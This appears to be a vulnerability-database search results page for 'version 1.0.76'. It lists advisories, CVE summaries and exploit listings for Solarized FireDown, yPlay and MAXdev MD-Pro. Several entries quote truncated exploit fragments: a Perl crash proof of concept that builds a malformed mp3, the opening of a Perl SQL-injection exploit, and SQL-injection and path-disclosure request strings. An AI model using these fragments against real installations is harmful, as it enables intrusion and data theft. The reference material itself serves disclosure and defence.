20 matches found
Solarized FireDown Browser & Downloader Security Vulnerability
Solarized FireDown Browser & Downloader is a powerful browser for Android devices from Solarized. A security vulnerability exists in Solarized FireDown Browser & Downloader version 1.0.76, which originates from a vulnerability that could allow a remote attacker to execute arbitrary JavaScript cod...
PT-2024-24328 · Unknown · Com.Solarized.Firedown
Name of the Vulnerable Software and Affected Versions: com.solarized.firedown aka Solarized FireDown Browser & Downloader version 1.0.76 Description: The issue allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. This is possible because...
yPlay 1.0.76 (.mp3) Local Crash PoC
No description provided by source. !/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print \n; print ! yPlay 1.0.76 .mp3 Local Crash PoC\n; print \n; print ! Author: cr4wl3r\n; print ! Mail: cr4wl3r!linuxmail.org\n; print \n; my $boom = A x 1337; my $filename = b00m.mp3; open...
MDPro 1.0.76 Index.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/22293/info MDPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromis...
MD-Pro 1.0.76 Index.PHP Firefox ID SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25864/info MD-Pro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromi...
yPlay 1.0.76 (.mp3) Local Crash PoC
Exploit for unknown platform in category dos / poc =================================== yPlay 1.0.76 .mp3 Local Crash PoC =================================== !/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print "\n"; print "! yPlay 1.0.76 .mp3 Local Crash PoC\n"; print "\n"; print "!...
yPlay 1.0.76 - '.mp3' Local Crash (PoC)
!/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print "\n"; print "! yPlay 1.0.76 .mp3 Local Crash PoC\n"; print "\n"; print "! Author: cr4wl3r\n"; print "! Mail: cr4wl3r!linuxmail.org\n"; print "\n"; my $boom = "A" x 1337; my $filename = "b00m.mp3"; open FILE,"$filename"; print FILE...
yPlay 1.0.76 Proof Of Concept
!/usr/bin/perl Usage--file created--load file--b00m.mp3 BOOM print "\n"; print "! yPlay 1.0.76 .mp3 Local Crash PoC\n"; print "\n"; print "! Author: cr4wl3r\n"; print "! Mail: cr4wl3r!linuxmail.org\n"; print "\n"; my $boom = "A" x 1337; my $filename = "b00m.mp3"; open FILE,"$filename"; print FILE...
CVE-2007-5222
CVE-2007-5222 is a SQL injection vulnerability in MAXdev MDPro (MD-Pro) 1.0.76 via a Referer header containing the substring "Firefox ID=", enabling remote attackers to inject arbitrary SQL. The affected component is index.php; root cause is crafted input in Referer header. Impact is partial disc...
PT-2007-6305 · Maxdev · Maxdev Md-Pro
Name of the Vulnerable Software and Affected Versions: MAXdev MDPro MD-Pro version 1.0.76 Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved by including a specific substring in the Referer HTTP header. The Firefox ID= substring is used to inject SQ...
mdpro1076-sql.txt
!/usr/bin/perl use strict; use IO::Socket; my $app = "MDPro 1.0.76"; my $type = "SQL Injection"; my $author = "undefined1"; my $settings = "magicquotesruntime = off, mysql = 4.1.0"; $| = 1; print ":: $app $type - by $author ::\n\n\n"; my $url = shift || usage; if$url = m/^?:http://./ $url = $1;...
MD-Pro 1.0.76 - SQL Injection
MD-Pro 1.0.76 - SQL Injection !/usr/bin/perl use strict; use IO::Socket; my $app = "MDPro 1.0.76"; my $type = "SQL Injection"; my $author = "undefined1"; my $settings = "magicquotesruntime = off, mysql = 4.1.0"; $| = 1; print ":: $app $type - by $author ::\n\n\n"; my $url = shift || usage; if$url...
MDPro 1.0.76 Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================= MDPro 1.0.76 Remote SQL Injection Exploit ========================================= !/usr/bin/perl use strict; use IO::Socket; my $app = "MDPro 1.0.76"; my $type = "SQL Injection"; my $author =...
Design/Logic Flaw
user.php in MAXdev MDPro 1.0.76 allows remote attackers to obtain the full path via a ' quote character, and possibly other invalid values, in the uname parameter in a userinfo operation...
mdpro-sql.txt
From: [email protected] To: [email protected] Subject: MDPro 1.0.76 - Multiple Remote Vulnerabilities SQL Injection: index.php?module=News&startrow='sql injection Show path to script: user.php?op=userinfo&uname='...
MDPro 1.0.76 - index.php SQL Injection
MDPro 1.0.76 - index.php SQL Injection source: https://www.securityfocus.com/bid/22293/info MDPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to...
MDPro <= 1.0.76 (Cookie: PNSVlang) Local File Include Exploit
Exploit for unknown platform in category web applications ============================================================= MDPro = 1.0.76 Cookie: PNSVlang Local File Include Exploit ============================================================= ? print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :...
CVE-2006-5564
CVE-2006-5564 is an XSS vulnerability in MAXdev MD-Pro 1.0.76, exploitable via the op parameter in user.php. The issue allows remote attackers to inject arbitrary web script/HTML. The NVD record lists a base score of 4.3 (Medium) with Network attack vector, no confidentiality impact, partial inte...
MAXdev MD-Pro 1.0.76 - 'user.php' Cross-Site Scripting
MAXdev MD-Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacke...
[SA19563] MAXdev MD-Pro ADOdb "server.php" Insecure Test Script Security Issue
TITLE: MAXdev MD-Pro ADOdb "server.php" Insecure Test Script Security Issue SECUNIA ADVISORY ID: SA19563 VERIFY ADVISORY: http://secunia.com/advisories/19563/ CRITICAL: Moderately critical IMPACT: Security Bypass, System access WHERE: From remote SOFTWARE: MAXdev MD-Pro 1.x...